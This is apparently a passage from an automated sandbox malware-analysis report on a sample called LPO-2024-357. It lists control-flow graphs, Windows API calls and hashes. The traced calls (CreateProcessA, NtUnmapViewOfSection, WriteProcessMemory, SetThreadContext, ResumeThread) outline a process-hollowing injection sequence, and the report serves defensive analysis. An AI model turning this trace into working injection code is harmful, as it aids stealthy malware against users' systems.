7b0c5d0 VirtualAllocEx 47671->47672 47674 7b0c60d 47672->47674 47674->47571 47676 7b0cd61 CreateProcessA 47675->47676 47678 7b0cf23 47676->47678 47680 7b0cd61 CreateProcessA 47679->47680 47682 7b0cf23 47680->47682 47684 7b0c0c5 Wow64SetThreadContext 47683->47684 47686 7b0c10d 47684->47686 47686->47598 47688 7b0c0c5 Wow64SetThreadContext 47687->47688 47690 7b0c10d 47688->47690 47690->47598 47692 7b0c010 ResumeThread 47691->47692 47694 7b0c041 47692->47694 47694->47617 47696 7b0c010 ResumeThread 47695->47696 47698 7b0c041 47696->47698 47698->47617 47700 7b0c860 NtUnmapViewOfSection 47699->47700 47702 7b0c894 47700->47702 47702->47630 47704 7b0c860 NtUnmapViewOfSection 47703->47704 47706 7b0c894 47704->47706 47706->47630
                                                                                                      APIs
                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 07B0C885
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SectionUnmapView
                                                                                                      • String ID:
                                                                                                      • API String ID: 498011366-0
                                                                                                      • Opcode ID: df7bda9c6c1c838814b1af116dce63e547c67b1afd00a6d130c304d2ddca1296
                                                                                                      • Instruction ID: 5badcd951bf651248b0fdf051b9419ac99357fe510040989ed69f6d4f94f94f5
                                                                                                      • Opcode Fuzzy Hash: df7bda9c6c1c838814b1af116dce63e547c67b1afd00a6d130c304d2ddca1296
                                                                                                      • Instruction Fuzzy Hash: 6C1137B19003098FDB24DFAAC445AEEFFF5EF98324F24886AD419A7250CB755544CBA4
                                                                                                      APIs
                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 07B0C885
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SectionUnmapView
                                                                                                      • String ID:
                                                                                                      • API String ID: 498011366-0
                                                                                                      • Opcode ID: d3774b581ee05d3125f2d58f34b6e02943f4eb4e20f18bb29e62c0e1661a0e78
                                                                                                      • Instruction ID: 45e78b66f2a49e8a12560154de0553a737d80c25705024a7fb059e566a395a3f
                                                                                                      • Opcode Fuzzy Hash: d3774b581ee05d3125f2d58f34b6e02943f4eb4e20f18bb29e62c0e1661a0e78
                                                                                                      • Instruction Fuzzy Hash: 6A1149B1D003098BDB20DFAAC445BEEFFF5EB88324F248419D419A7240CB756544CBA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9871f0214fc1f53e1701ea238c1a16896584b79e93ca99f7e3218dcb99b8f7b9
                                                                                                      • Instruction ID: ce22af2df61838acb46fa6d9b89908dcf7766ba00cade3f76627e9f1282c1b57
                                                                                                      • Opcode Fuzzy Hash: 9871f0214fc1f53e1701ea238c1a16896584b79e93ca99f7e3218dcb99b8f7b9
                                                                                                      • Instruction Fuzzy Hash: 95A23975E006598FCB15DF68C8586EDB7B2FF89300F1482A9D80AA7354EB74AE85CF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 14acab466f51a6c45b49b88348ffac54785564647ddb75957b349d66ab8c5343
                                                                                                      • Instruction ID: 4c8f086287da78f47be24c9541d09e6c1afeb0b0b32767e8e77bcd32a330c8a9
                                                                                                      • Opcode Fuzzy Hash: 14acab466f51a6c45b49b88348ffac54785564647ddb75957b349d66ab8c5343
                                                                                                      • Instruction Fuzzy Hash: C2A1B7B4D15218CFEB24CFA6C8487EDBBB6BF89310F1091A9D509A7291DB345949CF81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f235a19a6fb60429456d940bc5735de6f5170444c28019cbb3526caf0147ecf8
                                                                                                      • Instruction ID: da2cf6240c83a103cf56174ce1ae4d6abf269cacb52754b877dd3169178f596c
                                                                                                      • Opcode Fuzzy Hash: f235a19a6fb60429456d940bc5735de6f5170444c28019cbb3526caf0147ecf8
                                                                                                      • Instruction Fuzzy Hash: 2AA1C8B4D15218CFEB14CFA9D8487EDBBF6BF89310F1090A9D409A7291DB345989CF81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701631240.0000000009110000.00000040.00000800.00020000.00000000.sdmp, Offset: 09110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9110000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43b2e8a554b6766055703a62e807ee070c3259a76352bd6395b719052b11d7e3
                                                                                                      • Instruction ID: b0f13e64a352705f903c4512c31ab8cdb5dba01cbbf61cba2a3fc0326155ea20
                                                                                                      • Opcode Fuzzy Hash: 43b2e8a554b6766055703a62e807ee070c3259a76352bd6395b719052b11d7e3
                                                                                                      • Instruction Fuzzy Hash: 30813774E00219EFCF19DFA9C8846EEBBF2FF89314F14842AE415A7294DB349946CB54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de64d6cd7784c3bfdd72e9b36deff528254662b936e0d406db10f5d88a96c979
                                                                                                      • Instruction ID: ba73e15aa77b501e546b451cec0970df455de8caff6076ab10592f5322a32f2b
                                                                                                      • Opcode Fuzzy Hash: de64d6cd7784c3bfdd72e9b36deff528254662b936e0d406db10f5d88a96c979
                                                                                                      • Instruction Fuzzy Hash: 7E81C2B4D09218CFEB14CFA9C5886EDBFF5BF4A300F249199D409A7296D7349989CF90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 44ad8e300ea129a1d5342bfec75392b2e77f2bb9f0f3ba2a36e7e3e5ab0bf4a8
                                                                                                      • Instruction ID: debfa7fe48a953a5cb832095351655f8640c388dab1cae08d72de80d95efc1a8
                                                                                                      • Opcode Fuzzy Hash: 44ad8e300ea129a1d5342bfec75392b2e77f2bb9f0f3ba2a36e7e3e5ab0bf4a8
                                                                                                      • Instruction Fuzzy Hash: AB3192B1D046188BEB18CFABD94469EFFF2BF89300F14C16AD408A7255EB3455468F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1de11632af3cbbefd86029dfcb34c75fe3d4bb63d9e2afbb66a3ce0c7600f5bc
                                                                                                      • Instruction ID: a90086c7efcc8f1336acc8b066b12d541b1744ce76f768ced6bd4d2d8805b468
                                                                                                      • Opcode Fuzzy Hash: 1de11632af3cbbefd86029dfcb34c75fe3d4bb63d9e2afbb66a3ce0c7600f5bc
                                                                                                      • Instruction Fuzzy Hash: 8C317FB1E046188BEB18CFABD94469EFEF7BFC8300F14D16AD818AB255EB3455468F50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 294 103d41a-103d4af GetCurrentProcess 298 103d4b1-103d4b7 294->298 299 103d4b8-103d4ec GetCurrentThread 294->299 298->299 300 103d4f5-103d529 GetCurrentProcess 299->300 301 103d4ee-103d4f4 299->301 302 103d532-103d54d call 103d5f0 300->302 303 103d52b-103d531 300->303 301->300 307 103d553-103d582 GetCurrentThreadId 302->307 303->302 308 103d584-103d58a 307->308 309 103d58b-103d5ed 307->309 308->309
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0103D49E
                                                                                                      • GetCurrentThread.KERNEL32 ref: 0103D4DB
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0103D518
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0103D571
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: 189a06c6aaf76bedad14e59da475e84c24bc9479e94cf48630e998b128371456
                                                                                                      • Instruction ID: 65bfb2ccac5373f80607cdc0fb46d67466d472d47bce36426663ab994e6aacee
                                                                                                      • Opcode Fuzzy Hash: 189a06c6aaf76bedad14e59da475e84c24bc9479e94cf48630e998b128371456
                                                                                                      • Instruction Fuzzy Hash: 005155B09002498FDB58CFA9D548BDEBBF5EF88318F24C459E449A72A0DB34A944CF65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 316 103d420-103d4af GetCurrentProcess 320 103d4b1-103d4b7 316->320 321 103d4b8-103d4ec GetCurrentThread 316->321 320->321 322 103d4f5-103d529 GetCurrentProcess 321->322 323 103d4ee-103d4f4 321->323 324 103d532-103d54d call 103d5f0 322->324 325 103d52b-103d531 322->325 323->322 329 103d553-103d582 GetCurrentThreadId 324->329 325->324 330 103d584-103d58a 329->330 331 103d58b-103d5ed 329->331 330->331
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0103D49E
                                                                                                      • GetCurrentThread.KERNEL32 ref: 0103D4DB
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0103D518
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0103D571
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: f1f8b93bc807b737a646b8e242e1e7a14aefb7b51c57f60d051060d3ec95d44a
                                                                                                      • Instruction ID: 39df29203fd96d4b70eba5ccd5b78cc07d7519dae4488bffc6dbc828cad51f96
                                                                                                      • Opcode Fuzzy Hash: f1f8b93bc807b737a646b8e242e1e7a14aefb7b51c57f60d051060d3ec95d44a
                                                                                                      • Instruction Fuzzy Hash: B75167B09002498FDB18CFA9D548B9EBBF5EF88318F208459E449A7290DB34A944CF65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 466 7648248-764829c 467 76482a7-76482b6 466->467 468 764829e-76482a4 466->468 469 76482b8 467->469 470 76482bb-76482f4 DrawTextExW 467->470 468->467 469->470 471 76482f6-76482fc 470->471 472 76482fd-764831a 470->472 471->472
                                                                                                      APIs
                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07648235,?,?), ref: 076482E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText
                                                                                                      • String ID: p
                                                                                                      • API String ID: 2175133113-2181537457
                                                                                                      • Opcode ID: 041d5e9c0193e060bb613326cc4f4f841babd1f3a665279094d2d9ff1b4efdc5
                                                                                                      • Instruction ID: 73a88c5d7c5cd2283832c7c8a56a49da56a0952db0ebeb867246a827168501fe
                                                                                                      • Opcode Fuzzy Hash: 041d5e9c0193e060bb613326cc4f4f841babd1f3a665279094d2d9ff1b4efdc5
                                                                                                      • Instruction Fuzzy Hash: CE31E3B5D0020A9FDB10CFA9D984ADEFBF5BF48314F24842AE419A7310D774A544CFA4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 993 7b0cccc-7b0cd6d 995 7b0cda6-7b0cdc6 993->995 996 7b0cd6f-7b0cd79 993->996 1003 7b0cdc8-7b0cdd2 995->1003 1004 7b0cdff-7b0ce2e 995->1004 996->995 997 7b0cd7b-7b0cd7d 996->997 998 7b0cda0-7b0cda3 997->998 999 7b0cd7f-7b0cd89 997->999 998->995 1001 7b0cd8b 999->1001 1002 7b0cd8d-7b0cd9c 999->1002 1001->1002 1002->1002 1005 7b0cd9e 1002->1005 1003->1004 1006 7b0cdd4-7b0cdd6 1003->1006 1012 7b0ce30-7b0ce3a 1004->1012 1013 7b0ce67-7b0cf21 CreateProcessA 1004->1013 1005->998 1008 7b0cdd8-7b0cde2 1006->1008 1009 7b0cdf9-7b0cdfc 1006->1009 1010 7b0cde4 1008->1010 1011 7b0cde6-7b0cdf5 1008->1011 1009->1004 1010->1011 1011->1011 1014 7b0cdf7 1011->1014 1012->1013 1015 7b0ce3c-7b0ce3e 1012->1015 1024 7b0cf23-7b0cf29 1013->1024 1025 7b0cf2a-7b0cfb0 1013->1025 1014->1009 1017 7b0ce40-7b0ce4a 1015->1017 1018 7b0ce61-7b0ce64 1015->1018 1019 7b0ce4c 1017->1019 1020 7b0ce4e-7b0ce5d 1017->1020 1018->1013 1019->1020 1020->1020 1022 7b0ce5f 1020->1022 1022->1018 1024->1025 1035 7b0cfc0-7b0cfc4 1025->1035 1036 7b0cfb2-7b0cfb6 1025->1036 1038 7b0cfd4-7b0cfd8 1035->1038 1039 7b0cfc6-7b0cfca 1035->1039 1036->1035 1037 7b0cfb8 1036->1037 1037->1035 1041 7b0cfe8-7b0cfec 1038->1041 1042 7b0cfda-7b0cfde 1038->1042 1039->1038 1040 7b0cfcc 1039->1040 1040->1038 1043 7b0cffe-7b0d005 1041->1043 1044 7b0cfee-7b0cff4 1041->1044 1042->1041 1045 7b0cfe0 1042->1045 1046 7b0d007-7b0d016 1043->1046 1047 7b0d01c 1043->1047 1044->1043 1045->1041 1046->1047 1049 7b0d01d 1047->1049 1049->1049
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B0CF0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 658d697d524d65785c0f18e916203088fdb67b4e9d0a0da5c4b9e833a15f8646
                                                                                                      • Instruction ID: c826308634ca3018a646eaf9f8bf74de8963ba1a6d318714f8bfcfe157f55c76
                                                                                                      • Opcode Fuzzy Hash: 658d697d524d65785c0f18e916203088fdb67b4e9d0a0da5c4b9e833a15f8646
                                                                                                      • Instruction Fuzzy Hash: 4BA11AB1D0021ACFEB10DF68C9417DDBFB2FB48314F1486A9E809A7290DB759985CB92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1050 7b0ccd8-7b0cd6d 1052 7b0cda6-7b0cdc6 1050->1052 1053 7b0cd6f-7b0cd79 1050->1053 1060 7b0cdc8-7b0cdd2 1052->1060 1061 7b0cdff-7b0ce2e 1052->1061 1053->1052 1054 7b0cd7b-7b0cd7d 1053->1054 1055 7b0cda0-7b0cda3 1054->1055 1056 7b0cd7f-7b0cd89 1054->1056 1055->1052 1058 7b0cd8b 1056->1058 1059 7b0cd8d-7b0cd9c 1056->1059 1058->1059 1059->1059 1062 7b0cd9e 1059->1062 1060->1061 1063 7b0cdd4-7b0cdd6 1060->1063 1069 7b0ce30-7b0ce3a 1061->1069 1070 7b0ce67-7b0cf21 CreateProcessA 1061->1070 1062->1055 1065 7b0cdd8-7b0cde2 1063->1065 1066 7b0cdf9-7b0cdfc 1063->1066 1067 7b0cde4 1065->1067 1068 7b0cde6-7b0cdf5 1065->1068 1066->1061 1067->1068 1068->1068 1071 7b0cdf7 1068->1071 1069->1070 1072 7b0ce3c-7b0ce3e 1069->1072 1081 7b0cf23-7b0cf29 1070->1081 1082 7b0cf2a-7b0cfb0 1070->1082 1071->1066 1074 7b0ce40-7b0ce4a 1072->1074 1075 7b0ce61-7b0ce64 1072->1075 1076 7b0ce4c 1074->1076 1077 7b0ce4e-7b0ce5d 1074->1077 1075->1070 1076->1077 1077->1077 1079 7b0ce5f 1077->1079 1079->1075 1081->1082 1092 7b0cfc0-7b0cfc4 1082->1092 1093 7b0cfb2-7b0cfb6 1082->1093 1095 7b0cfd4-7b0cfd8 1092->1095 1096 7b0cfc6-7b0cfca 1092->1096 1093->1092 1094 7b0cfb8 1093->1094 1094->1092 1098 7b0cfe8-7b0cfec 1095->1098 1099 7b0cfda-7b0cfde 1095->1099 1096->1095 1097 7b0cfcc 1096->1097 1097->1095 1100 7b0cffe-7b0d005 1098->1100 1101 7b0cfee-7b0cff4 1098->1101 1099->1098 1102 7b0cfe0 1099->1102 1103 7b0d007-7b0d016 1100->1103 1104 7b0d01c 1100->1104 1101->1100 1102->1098 1103->1104 1106 7b0d01d 1104->1106 1106->1106
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B0CF0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: f701cb923dbe69d0342ec32d7849a765a609c8ea24261966b0f794d6a91b5ad1
                                                                                                      • Instruction ID: 7247af33ddfbb2c164e7ac4324d17157e94e61bc1621ba8c462e7620ffed9f9e
                                                                                                      • Opcode Fuzzy Hash: f701cb923dbe69d0342ec32d7849a765a609c8ea24261966b0f794d6a91b5ad1
                                                                                                      • Instruction Fuzzy Hash: 4F912CB1D0021ACFEB14DF68C9417DDBFB2FB44314F1486A9E809A7290DB759985CF92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1408 103b1a8-103b1b7 1409 103b1e3-103b1e7 1408->1409 1410 103b1b9-103b1c6 call 1039c18 1408->1410 1412 103b1fb-103b23c 1409->1412 1413 103b1e9-103b1f3 1409->1413 1416 103b1c8 1410->1416 1417 103b1dc 1410->1417 1419 103b249-103b257 1412->1419 1420 103b23e-103b246 1412->1420 1413->1412 1463 103b1ce call 103b430 1416->1463 1464 103b1ce call 103b440 1416->1464 1417->1409 1421 103b27b-103b27d 1419->1421 1422 103b259-103b25e 1419->1422 1420->1419 1424 103b280-103b287 1421->1424 1425 103b260-103b267 call 103ae60 1422->1425 1426 103b269 1422->1426 1423 103b1d4-103b1d6 1423->1417 1427 103b318-103b3d8 1423->1427 1430 103b294-103b29b 1424->1430 1431 103b289-103b291 1424->1431 1428 103b26b-103b279 1425->1428 1426->1428 1458 103b3e0-103b40b GetModuleHandleW 1427->1458 1459 103b3da-103b3dd 1427->1459 1428->1424 1434 103b2a8-103b2b1 call 103ae70 1430->1434 1435 103b29d-103b2a5 1430->1435 1431->1430 1439 103b2b3-103b2bb 1434->1439 1440 103b2be-103b2c3 1434->1440 1435->1434 1439->1440 1441 103b2e1-103b2ee 1440->1441 1442 103b2c5-103b2cc 1440->1442 1449 103b311-103b317 1441->1449 1450 103b2f0-103b30e 1441->1450 1442->1441 1444 103b2ce-103b2de call 103ae80 call 103ae90 1442->1444 1444->1441 1450->1449 1460 103b414-103b428 1458->1460 1461 103b40d-103b413 1458->1461 1459->1458 1461->1460 1463->1423 1464->1423
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0103B3FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: e316a1aa1189e3ff51df69c797363826a793b67f251a4ed549bd93ad3ea84cd6
                                                                                                      • Instruction ID: 7b1e68f6ff4ad82f27589f50f3f3bb388f8c559c8b7a18c6692c716f1000d8c6
                                                                                                      • Opcode Fuzzy Hash: e316a1aa1189e3ff51df69c797363826a793b67f251a4ed549bd93ad3ea84cd6
                                                                                                      • Instruction Fuzzy Hash: 247167B0A00B058FD764DF2AD44179ABBF9FF88308F008A6DD48AD7A50DB35E945CB90
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 010359C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: d5196e6efdbc9239e8d33931dd032450a02f50307424bb8f02b4e28376a588fb
                                                                                                      • Instruction ID: 9ad2ad07475072eb36b230dc120e32142baa62184fc65e2d51c870f41bd53ff8
                                                                                                      • Opcode Fuzzy Hash: d5196e6efdbc9239e8d33931dd032450a02f50307424bb8f02b4e28376a588fb
                                                                                                      • Instruction Fuzzy Hash: A741D2B1C10719CADB24DFAAC984B8EBBF9FF89304F20815AD448AB251DB756946CF50
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 010359C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 0b6c362663ccfa2b4c9d80ffe60fa077c2d03bde4f0b9fe44c5bb1f2ffe68660
                                                                                                      • Instruction ID: 137f3c4f71c4e52672404cf4011d3f95b0c7a78241937487fd488e6501e14367
                                                                                                      • Opcode Fuzzy Hash: 0b6c362663ccfa2b4c9d80ffe60fa077c2d03bde4f0b9fe44c5bb1f2ffe68660
                                                                                                      • Instruction Fuzzy Hash: BE41A2B0C1071DDADB24DFA9C984B9EBBF9FF89304F20805AD448AB251DB756945CF90
                                                                                                      APIs
                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07648235,?,?), ref: 076482E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2175133113-0
                                                                                                      • Opcode ID: 91f2e33dab86da600a2d6073d1b3f275f3cff9e0080ee620edead4088c815399
                                                                                                      • Instruction ID: 0c7bc87ee40c14adeaf8490b2d92f87c6aa77460ad8beb7ee651265a33a4059c
                                                                                                      • Opcode Fuzzy Hash: 91f2e33dab86da600a2d6073d1b3f275f3cff9e0080ee620edead4088c815399
                                                                                                      • Instruction Fuzzy Hash: 0F31E2B5D0030A9FCB10CF9AD884A9EBBF5FF48320F14842AE919A7310D774A940CFA4
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B0C6E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: ac388a6b8f8d6119172b0d789c76d03f9f7f3696885b5eba4b249d82a3681813
                                                                                                      • Instruction ID: 12ed9a24584de572e1a322e1f8550cfadcfb0d9899b8b05cb91b00f77a0ffb3f
                                                                                                      • Opcode Fuzzy Hash: ac388a6b8f8d6119172b0d789c76d03f9f7f3696885b5eba4b249d82a3681813
                                                                                                      • Instruction Fuzzy Hash: 532106B590030A9FDB10CFA9C885BDEBFF5FF48310F10852AE519A7240C7799555DBA4
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B0C6E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 8a91e30d9c082baf6eeae9cc52e48ccf9d226d11fe93d7950ea7f712661fa8f5
                                                                                                      • Instruction ID: 1fd693f9f3d7cf7dcb6b23809dce20fd96945c11319e10e56fcff5747360daec
                                                                                                      • Opcode Fuzzy Hash: 8a91e30d9c082baf6eeae9cc52e48ccf9d226d11fe93d7950ea7f712661fa8f5
                                                                                                      • Instruction Fuzzy Hash: FA2127B59003099FDB10CFA9C881BDEBFF5FF48310F10842AE919A7240C7789940DBA4
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B0C7C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: d2996b00cfd12d4974014a72c24a84315cdba825d5402df0b43f56aa73854ac0
                                                                                                      • Instruction ID: d13697d807b0f4b666b3b1ea6878a757c8bcb6f5c0c90f8134064e0001d50757
                                                                                                      • Opcode Fuzzy Hash: d2996b00cfd12d4974014a72c24a84315cdba825d5402df0b43f56aa73854ac0
